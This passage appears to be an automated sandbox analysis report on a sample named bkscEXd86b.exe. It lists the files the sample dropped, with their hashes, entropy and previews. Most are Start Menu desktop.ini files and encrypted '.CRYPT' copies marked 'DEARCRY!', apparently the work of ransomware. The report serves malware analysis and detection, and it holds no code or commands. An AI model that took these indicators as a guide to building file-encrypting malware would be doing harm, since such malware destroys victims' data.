                                                            C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):872
                                                            Entropy (8bit):7.702584949590397
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9AA88DFCAA42C260B59B7EB2340F1E94
                                                            SHA1:951413E3CB6AA0E4D104D687BBD99E00148561F5
                                                            SHA-256:79012F8237488D1E242A42CE343F771CBBF08E59122F83E2F000E70725C487C1
                                                            SHA-512:457130C9F027C8945CD4B607543D47D575A412B475C068D30143F173A6CA06AE211A55EDBE333BDEADF6B412875AF4E34D7F9A2BBBC0DB056F437D6253B75DA6
                                                            Malicious:false
                                                            Preview: DEARCRY!....V.t.ZM......Y...K...[u.1-.g..T.~...t..LI.z...Ot......^@....x..+...3..3..l.Xj..#Ym#...8.......p.U...D....=l..,.fe+T.W..]....wf.Y2Q..&....b..$.......2.9.x...... .DUj.;#.b......PW.[0...avLi......7..7...V]*..|..1H.\<...~.F...TVP[x..#....?...b.&......@.........r.F.r........I.D...<...Kj.2.ot....#....w.K@..c'...#..........#......p..T.[F..XTP2....F......./g.Q*....S..a..d.3p!..LC#R=...#..G..$.A/.t..89..r.B...+.#..k"..,.U...P.....c.kmF.b+..6......+.l_.e........3.0;YW.B....x.=.VO6.k.....u........O;.8?Q..|........g(.G#Io%..4....I`h...,.m..3.....s.,....P..+.0E0..F.;.../.+.Q.k......................N......`}.[...T .A&...s.^.4....U.&n.l.j.._.V..R.m.L.!...F.......P.u....7}q..d..........."..D.#~q...z.v.9'.....YI..x;sA.g..~.G......(I..qpAY....]...>.ZF'.l~..4..x..EV..`..#S.$~....=...4.$.L....|...m.$...ou...!}Nr.Q
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):370
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D9F0A9D8ABC914943BDE2E21B6E810B1
                                                            SHA1:23B78362ED8FBF9EC778507E091D1EDB82C802AC
                                                            SHA-256:C3FDCB51036653B9FC643DEF9DA6B1992A45485D21211C97A32F7ED451A6A1E7
                                                            SHA-512:B67FB9CB4A407016D50E508F4742004656B6F7F345C8F058D89B22A5248B442EA449B7292458ED9FC3220E6CBFD91C8E8B7CF3B969DBC88E16A6B004853CD6E1
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):664
                                                            Entropy (8bit):7.713005330614933
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BEBA8C92B8131F42BE499090F44A495B
                                                            SHA1:A5FFC502DE8B8EECA52E782097767DD140874089
                                                            SHA-256:B7FD11CACDBDFDB7C22FB64EF1E3F7B261782191E2C5AB99FD4A8F1319DD745F
                                                            SHA-512:DBD28501F465FBAD8F67ACA7CAF89B262E7B5B7D6123BF52C6BD95C4F311A1CEE9BFDFB64A7C4E76357AE3BE6887B621788420FC7BCCEBDEB986A6D5671D48A5
                                                            Malicious:false
                                                            Preview: DEARCRY!..........N**9]!../..,.p.....u..D....-...._-...(.g..I....W..J...'....`.h...m."fW.........D.....\u..A.!.,v.".\..ec.I......L`..A\. B.k...m.........^.i.*)...Ms.{V..Rx{...{.x.)..).4...NV.F.......'.(....Q.<.....pC.....y....(C&.l..W...ex...r.\....(LL....r.......X...F...7C.....*+..Y...J..ZTMunU."...O.)..lW..N.R.?;.e...x.goz.5.......i.....w.r=@q..6k...l.......>O...d6..q\X!.P.\>...M..E.......B.m.....W.Cc[.2y....j.H....n..P...@....R4......6..T..LrWe....w..[_y..q+..;........T.^D\.R......7....|;...lL..!..4.'Cu.....;..PT.8..{\.0z..AKQ.m..=:.....eT..w.L...#.....G!.`%...@..t.9v4....X..L....>..H.qd...Z.[.Xp.\gA6.o.s..,.....S.?G...U..
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):85
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E956031D7BFE0E613C86B6D27FD126A0
                                                            SHA1:BCC9FE3FFF88FF66DF70C1E53401A28C5873BD63
                                                            SHA-256:6C99E32B005A3A4956B9406AB15411E666C7F67982DB170AE1FB111EC634B9C4
                                                            SHA-512:AA4ACFF27639061E8FA9A93D69D7DDCB0C4153B3C6657451D2120A4BEB262A96A5550AA4BEDC866258AD1ED35CD2392949B556A3F1C5402B95F7CBBA7309AB6D
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):376
                                                            Entropy (8bit):7.351144446100854
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B838AEC8B5481A137A2394EB4623F741
                                                            SHA1:0E87F72B3AADE885539F3BF52331EBBDC85A79C0
                                                            SHA-256:0C1B38C13A819976D100DA91DE9BE030C25DB6A2A91AF2EFEC09806D4AE72649
                                                            SHA-512:3DD0FBB8DDA3DFE94F6F7B2D14D031D77A316EA4BC98DE781D3D2DA382D70725D8FA5C3A1647FF27309254A9AB985938E73B06AB902327FE991C34EA8BC662FC
                                                            Malicious:false
                                                            Preview: DEARCRY!.....p..\UB...j."..............1..\Pof.6.N.....6...T....0W.u8..d.j\Z...........l.u...............9.M.=_..7*f-I....[...Xc..U.x...w...8yQ[.R...V...pf........D.K2D.........,X......s..!x....Wp;=..rU)C..x.n.(.G....._+.............N.[....4.e....d.......U.......sp....t.}....U4.......#.4`W..e.....G.....(.v-......hnA$.(_k.I...g.....Nq.).[q....kq.|e.
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1362
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AD18E43AA3B981A732FDEE527C505190
                                                            SHA1:7FA986E0BB92F786437D9734F3DD462E396F4425
                                                            SHA-256:14CCCDE0BC083B9D329FDDC339F7B4C17B293DA99555A491488FF8E9DC660F8B
                                                            SHA-512:6A5AB416FB7BA6ED98A3184A2519033D4935AC9CC50E149B03532C144CEB48D6317BBE8EDE009D094B4B52EC115772199FE11919F69CC89AA358455B74CB89CA
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1656
                                                            Entropy (8bit):7.869358619641375
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:015C5E7B6577B07FC3D77D4A6288BF48
                                                            SHA1:B214F958B98011338B4D20500B19212596F2F586
                                                            SHA-256:854E124A036DC9C29140778B649C9FE18DC8520BFC9627863F1794F3C444A6DC
                                                            SHA-512:8DC1C7031ECA37059D3EE612946F815F2C97490E27263A9821D125FBD817CC275F8BDC1B1C25D8152DAC9F29E1085A956FE5EA942E7DA8EAB9D3A0A47043F516
                                                            Malicious:false
                                                            Preview: DEARCRY!.....9....5.-....r%bm...-.M..@....9`..=.&.<.W..(.&p.f+.V.....9....kjJ5...~..^,....7.{..D6....3.........`.\.o.Y..0.4...u.^l......;F......;j>&.J..0TwJ.;....$.V.....3.Pg._3.....8.f.&8.....7...3~.....5.......p..#w.G..xvi..;..h..6Y|Ye....*.x>.p.........R........L.....T..@.=..n...nmla.......Z..8.I....,z...c.......R......_"...pra..E}.}..r6.`.YU..o-..P....[...........w*.Tj..W]...g.ag.9A.p?.Q..&.....X.Mh....?.X..+u`....3.....(....7.!>t..-i...%.-=.B.O.."....k..U.<....3.D[.@.....?|.0...4.......^E..p.O.*..m...T..)........y...4H..<..[...........p~)..L4.t.../b...... 5.c....ZM...D.1n..Q.R.&..Ey=o.Cz...V..]._..T.F.3...}?....D>.c..9.6.K......>..<..j..U..V|..~d....A...`.~'C.rR...w...6kK.DA.+..B..1.I...;..|.t(C.t....G.W.r\X.X.%..{.U..9$ka;.....e..fsA{d.q..X......A..Mr....@......d..M.5.....?..D7.U(<....f/_....c....S.Tw..[..qk..El.)....C.b.4L..-......7.PNd.V#P[ -....{.d.Aj9..ru..+..M..J#.5.p......<..~APD.?.#[..U]...n..w.#..+~a.2...&.X..
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):27460
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:237979342DC81BE0421EB7D3BC12F4DE
                                                            SHA1:77E4981A86522E5D821E611606C4CD6DE1253B57
                                                            SHA-256:0FDD1BCAD0F9A37FB03A6F70B62565296536A1A4E6CE3852E43788A08195C5B5
                                                            SHA-512:CECD9F10975A7E729B8D8E621F676C7AB5947C6649CC614219ADC2C086DAEA4B7DBEC53DAA0BA230D6E2F9DE9ACB60BDB47AB0C8551DAD1BAE439B45FAF35B13
                                                            Malicious:true
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):30320
                                                            Entropy (8bit):7.991800743451044
                                                            Encrypted:true
                                                            SSDEEP:
                                                            MD5:7836EB8316B97B204B5574FFBCABCE4E
                                                            SHA1:E07CDEBEFAC322FD31FEEA9729A3E8BF2402DAF4
                                                            SHA-256:392AC123D6D310BF34EFBE7B8B59443BBC6BAF80C976D67E59FDCAE9B74DD2DD
                                                            SHA-512:A9DA8685CA7A04AE6D4911E799C6A7BF3A3ED2D5111A3F4413C6379B3B3578EA402F5B65C4DEF14E4D10EA7E73BA09AC2BEEC6EF6DAB697172174ADC158DB86F
                                                            Malicious:true
                                                            Preview: DEARCRY!......1.a..1..TW.s.....o..Pg......R.b..{o........./9w..(.oP......a...7E.,....R.".].....a.4\.,.>...f.Dr..k%....]2...AK..:...S.0.1.M.s.Y5\..O...e...6...N..`c.<..g...Y...C.*A..A..^...p.[.|&..v;L....G...o.{H.V.'.G....7;r.~.*.#kz...F...}(..;*...hi....Z.......................g.......E...x..#..8rK.-..B.....L........> ......8........~.X.o....f.n.p(.....Am..x.Z..!.............".gWLAH.. .E.c...{fq.K.U.qk8.W.^i.....D..O.....A..'6o.|.,.|.s.H...k...P..;.....n..-..S.m.Z..}%.NA.d1 c...E....Y....$7...Fuz..D]_]!.dM&..M..U.?..~Rm...U..t.b&.'IB....c...`[.G.s+.5w.p8.u......."J...g....5.......@.\).kK..c7E.;.u......|./...$...."</.....!*.!2.....#@s.$.}.K....$>.=8.....x......q4.....V'5BG..=qft.2..&...ymR]z,Y.(v....&fDL.dB....cN...%....E..s......Ya.j.i.....B.Q4e....zZsx.......].. 2.......0.....{n.#.....C......1..!.#Yf/l.^}...#.R.j{.n*(#...$....*0..9O.5v......Z._.g..jE....x+..x.....6.t..t.aeU;&J....X.y}Mr4.A...8....v...J..jp..Mw0...AN.3I....._...3/|H4..)......F.I
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):170
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C5F74317E9F328452E4240295B6229FB
                                                            SHA1:79169F0F0A049A094AD818B8E4717CF43FCBBF98
                                                            SHA-256:7E5112B5DB200307FE7148CBF8CC0BB8F2F520EFE3BC902D72C226B5BDBCA0B8
                                                            SHA-512:E2EDD7C91D35677EE83403E93468C9F51B00B556E644929F0509DD6DFBE920FAC685B7F48A2339A081A30AF68EEFE667BDCF6403AB38490B89B97E0CF0DC03D6
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.394941024666915
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5D43F5A83F845E0703DF72CC21FE53E2
                                                            SHA1:E463E2A13D64ECA4E23DCDDCA96FDC34BF49038D
                                                            SHA-256:BF137D1F09002F8298FCA59A10B2C6DFC5F70574ECA504655E64768AC8A1A1A2
                                                            SHA-512:F4C4D276D5AFBBBE007305DA986B3D3C11460D1226325B0183B72CD0002C8678A38308ED0E55155336318A456C6627B544F51B0749FAB65CEDC5941093525A3B
                                                            Malicious:false
                                                            Preview: DEARCRY!........(..p...[<d.!W....#.=W#.L?.'.1\aU..]...#}>. a.-.....a.....l9....d4i..tA.6..E..B......G...w...;XI..^._5....@...S"[u....h {z.....)........O..S)...().....5.4U..E!L....{..=(|_.a..32.t....../p=.B.C.`.C+...h.0.D.....@.v`..+....f%^jg......K%.................._......._.?..Y7.z.Z.9.`..^:\.rM.'<)N-..XtR......!m..o;tn!..$Y.`-.....[U.=,.:../C%._.....<.1.D..\..a@...}.......!.g...M..F.......[.L..../".../.v.....y`c....<...O<.M
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):494
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5D5C142D5E2C3C0F8FB91462CF9D6E7E
                                                            SHA1:69887F19D96CEEEBC4F58D3A49C5D79AEA308A03
                                                            SHA-256:70732E7FEE8B6191AE91AF27C6CBFD276D41E62BD423FE634A28EE28C4A934C2
                                                            SHA-512:24DC2E7AE4A7A84BC8E6EEFC80860FB44484C569391CB848FD12EBE9C5BC0E87C11CCA48929FE866F634D8129CA69037F894E20F43ED3BA9157151396750D92B
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):776
                                                            Entropy (8bit):7.724493915432036
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2488AE5244F98E9E07A4A3BEB801F4B7
                                                            SHA1:E0EE16DEDF3468E8E8C879302BC3DFFA9639D399
                                                            SHA-256:1E7AEB1A9D2D021376CF0602E11C3E1039DA37CAE570DCC6E4FA0AC6188F1C30
                                                            SHA-512:4340EDDFFF56ABEE0056CF408182CC4A8F7B73DA507798A52B37C89872E15EB620CD889F1671B369D9B5AC87114F7426EE7F617EC942DAFD8FCB9B78984D9AFF
                                                            Malicious:false
                                                            Preview: DEARCRY!.....y..yS}..P...f.p..!}.s.^l..+$0T...|;]ge.a;..*^.hw..P<.L54.H..F.2,.g?!.9..z>...}..T.+0..+.......l.....oFjS`.95[........n.3{.v....;..^........H.K#l.*3..A.....+.|^}...z/..P.+.91&..B.`6._..AZz.....$...../Q.y....2C..A4{.y.p!;...A..O..uE........UB.f..J,.............m...].MI%i.U..d.g#m]..........u.+..Z..Uy.6..|.v.A...%.v.P., .....'{.S.A..7#...1..,....D.ez...3.{.n.P.qrB.........IK.#......n...s.01..i.. .r.2Y..*...,'m...[.;....yk.#Sp..T..T.q......a.eOP....L.^..}k.M.:.Ys..7.v.-O..c..K*.....r>..SRYy`.....`. !..I.....|/1?.....^.U..J......?}.z.-.5..QT..`.qe..z.#.F.2.-../.....=....4..8..d..H..8.....e..O.....I4..J......Y....`....K.x..&..9.B.G.1p...U.b.....&..8.....L..^.)2.$(.VF.............qpl.7... "N...-.....d.%.WS.......v...K.S......t4.c.:
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):174
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ACE3165E852ADB8AEDBEDA2AA3BE570B
                                                            SHA1:4577FF7E92850E2723008F6C269129BD06D017EA
                                                            SHA-256:237F73D46D3501DE63EAE1F85FDF37E65DDCED70F013B7F178D1EE52B08F051F
                                                            SHA-512:CF77563B9295B191CE2F309E03618D1AB4D317F65B87DBECC4904EE2D058DB06D23C20C199571B0FAFB67AE5EC5166B76AF0B7D8BFE3996B0DDE9751E28F8C03
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.537633464098582
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7148E7F6CC2B8DEC2156C8F86AEBFC4A
                                                            SHA1:7C032574A11EDE9B8DB77589785546329FDCB5FA
                                                            SHA-256:3EEF61EE19708099140A080EE9BF497C5967A579060E5D0E79A53C791FCD54DF
                                                            SHA-512:96409AA219B28DB085190E04CB6F1DD3E9EA32B647296306566DB668E7B5ADF810DD7BC12608E1818FFBD1A55BA0A3BCFFA952E2A99E1A4EC7021C4B9B0F1AC7
                                                            Malicious:false
                                                            Preview: DEARCRY!....=.[......|.r`....miNLh.{_.#.rJ..I....T..:...[.P#o.1..[.$0..y4.H..Gp.^s.W.....U....I1..g.;}.+.d^..I......'p.\.m7....:...,...D.....T.....?...J.".m.1..&....<U.K.M....>..\..Fg.h.......C.........c..5G0...{..)..]~s.:..i....]f4r...E...Z-......7Q....e...............b..IOA.....e.x>....S....O.....e."-..~q0.K.......N..y...l./...<...G...O."....5.p...VG........4..a.pF#...J+.......&.'z...\.T*.......X.2.....9.[.8....Af.V..XB..1X"...Z.
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):338
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E54914068570928FEBE65C8DC7FDE287
                                                            SHA1:46D0A3754B75FAFAD74CFA0912CCF2D9457C14B4
                                                            SHA-256:A4C65A576C9848BD6438BA704E90BE3D2EA275F83DE420608343F6A27691640D
                                                            SHA-512:0A34DB8E8A6FF3E67E1AF3E63F062A2E7B8F43F8D74A620F130ED25BDA34A3300003EA95C3A1ED86D4348A34E450548075FB3D914B87BEB25CAF4B430F84DB00
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):632
                                                            Entropy (8bit):7.690030369543612
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:C62D6BE47EBFA73FCF5868AE902BB599
                                                            SHA1:D1D3FA58AE63B085B940D413FCA02D33D06857CA
                                                            SHA-256:8A0D37DBF661DCA3CD8CBE08E9A11FB17EF1CA52AD698005267909CEB4D14D65
                                                            SHA-512:CD444D42EBFF919B28D37B7AF641E2C0F6A00A1D36F41383C79CF553C4277B14DF0C3D02666E295F040F307E7CE27C6586E579C09DDB58CA64FA533EE3AE08D9
                                                            Malicious:false
                                                            Preview: DEARCRY!.............&........w.{.S....3.y...f8..J.)R\.O6$..*Bc.. .'......|1...7Dx.~......6/....C.g.J).Os.&.../.S@...D.........[.e....n.WRa...U.z/*+...-..V.a.W.`..K>.........0.Q.p,.Vk..mpN|..]...6..iAg<....t..... .PD'.....M.e..uQ...l.{..4i....-.G.?....R........n^w..o=s......I*..0{.....J...!..........Fdx..iH....f.h..5.(Io..O..J.a...:!.U..{+....F./.:in.g..p..9..+}.$....fW.7GO......dm.A..EA.&...r.}...G'.8.X....&..r......I._Q.XStL......z.=...R....Z.U..=.......T..%..6..%."F.zb<e.:..w..+....C.}..%..=..J.....0.L.y....& ..[@./:@.!....n...Oz5.....a...y.\...I........g.r.[JF}..7zK&.F5./.....".....
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):8880
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7E9263E27191BF5B5985BE3D7C3EE487
                                                            SHA1:73ECAF33376142BDB52380A1EEAFAC24DFA9C190
                                                            SHA-256:AE8DDDF127F229A4BA99822B72C35AB9657618FF63FDB7A0A187EF66D79A5B95
                                                            SHA-512:CE7BAB45DB718DE99E9A2C08F72C86B8DC1AB1D3E3E7ECDD2663C452F17B5D070D78D9DAFB746A8C3F970DCD22986AEAEBB74C87F3D1F9FFA39CB8E6E7E8E4DE
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):12384
                                                            Entropy (8bit):7.965750900984845
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7D46C7C97A6594F5D0DAEA2A68F16B09
                                                            SHA1:5994FA5D832E081579C2FEB5E0EAE171EEA96D17
                                                            SHA-256:E3F9F69B4AA3EC6D3D351EF50B0D9A28967E1BE89F7334C647A0C720FA1DBD9B
                                                            SHA-512:0C45EAA7A9D78AA785A4549B7EAD9F4113D1C1DC825A4AA5528B8FD2B934B4537784A3E488B081514C521B37BECA36D82C00817A5DB2BB6AD162C9133A6E6532
                                                            Malicious:false
                                                            Preview: DEARCRY!......@s8e.tul....10.v..s..."......T....Je._.(.{.....#..5.f.....K............o.+.....H6>...9 .De}..z..]....i..(.........'.Fg8.........E7..:.w..-.?n..T.8.-y...~..K.Ggj.<~(.(!.......s....7..;..'...LFv.c4..<.....z]K...\P..v...!..FMd..{....^..p. LH..............|GQ)........jY....j..P.!.@...... o..`",...9&L...xQd..E.;Y.G....m.it......{46.C...o3k.\.@~d0... ............J..K......7.....w.S1.E..W.P...l.......I"B.h.V.7........|.O..-J:.\.-....^.BQ.Rw.tn...F(..{..=..;yL...5 z...:..w.&..b.{_.%.\.:B..w.......lB.....w....c..^p.+.{..vq.%.\i....F.....%9t......(._.u*.&.]~...XS...T)r<\.........c..C..<.E...m....6.....b[[...W...GK..4N...v....xd......GG........W..;.m~.d....y..!...2....qU.*..i..p}'>...a_B...%e%.......5.d...zMpC.Y..Tk...7.U.t.G&.G.'.B.......QU..Y..?...l^I........_L..)...pJ...)ce...:J.v.._.....@....W..Wxv.RO.(.V.gu#.y.w?J...TD. ...|.m..m...B..t.[.q...)..u|..s.7.|N..v.\...ZY,..[....N~l.?.b...qD0.j.UP.1a....o...U...AF9.d..............b
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):174
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ACE3165E852ADB8AEDBEDA2AA3BE570B
                                                            SHA1:4577FF7E92850E2723008F6C269129BD06D017EA
                                                            SHA-256:237F73D46D3501DE63EAE1F85FDF37E65DDCED70F013B7F178D1EE52B08F051F
                                                            SHA-512:CF77563B9295B191CE2F309E03618D1AB4D317F65B87DBECC4904EE2D058DB06D23C20C199571B0FAFB67AE5EC5166B76AF0B7D8BFE3996B0DDE9751E28F8C03
                                                            Malicious:false
                                                            C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):456
                                                            Entropy (8bit):7.440916065113356
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:881F65127B7C37D80F8806B88D0D61DE
                                                            SHA1:93AAEEC52A6332203AE6F88C4BF80CA0665A2422
                                                            SHA-256:7B6E49290863D37002A614EB477CCEB37EBD93948EB278A2B636F322D71AB25E
                                                            SHA-512:D1EA1275515B80CE8C792C9B086E974EC3A188BCC0ADBF6503FE79F32DCC08F38049E2136C7295924962BDE2BE1DAA07085D5FDC7EFC902D24BC0A7E0D9AA3AE
                                                            Malicious:false
                                                            Preview: DEARCRY!....O.%...f.....jw.[.Q...w.vHD...b......2.....@..%...A[d.....4\.kF:.g.3j.l.%.'V.f...v"-4.)2...8.;..,.....]Ur.....\....v.~.a.....z....W_+...D.~.g..>..}4........(..<'A3.....f.)T.y.........X....q.fE.<..v.$....+..]..$h3.o....G!{..keJ3.`.'....&.!.).................-<.J.7u.Q.W...I.. ...>..a...J..Sv.5..C.Y.^.....8V0|I..J..?^...)..x>....a.3.aIa.......,..9r..g. .2/......&0.Q..NMV..H.&.....4q....qf.ojK......ja..../"@.nc.\b\..+?...l
                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_de01dd31a8cef2e8c7bdabd18058c0327f9cf_10665708_1b2206c2\Report.wer
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):32486
                                                            Entropy (8bit):3.6821013589828393
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:035352B995E5D504FA045B65CFFD0722
                                                            SHA1:BC137AA9E2782EF86E669678DD33D7E7B9A71468
                                                            SHA-256:63AA82FF9A94A4690C76804F01B998BBEB93B04D3A57B3901E610F5F056FCAD2
                                                            SHA-512:C09B7CB4C6351EDBBCEB9F71032C282F758FD01A425F63AE201E5A9BC22DA65C02ADBA7BB2E2BDB2DAD92669DE49AEDB48AC63DEED27BF93DF69388C2D7BF6A1
                                                            Malicious:false
                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.0.0.0.9.4.3.3.8.7.7.6.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.d.f.4.0.8.1.-.9.3.4.b.-.4.d.7.e.-.9.2.7.a.-.6.2.9.e.b.d.7.a.4.9.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.a.6.5.8.3.b.-.7.3.1.0.-.4.4.0.d.-.a.7.c.9.-.6.c.3.9.2.a.e.9.c.e.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.3.c.-.0.0.0.1.-.0.0.1.7.-.b.8.2.d.-.9.f.a.4.0.a.1.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.d.0.2.9.9.1.4.0.c.f.9.8.8.7.5.b.0.7.d.b.d.2.d.8.9.2.6.1.7.4.0.1.d.a.d.8.b.9.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.5././.0.4././.1.2.:.0.2.:.2.
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F7.tmp.WERInternalMetadata.xml
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
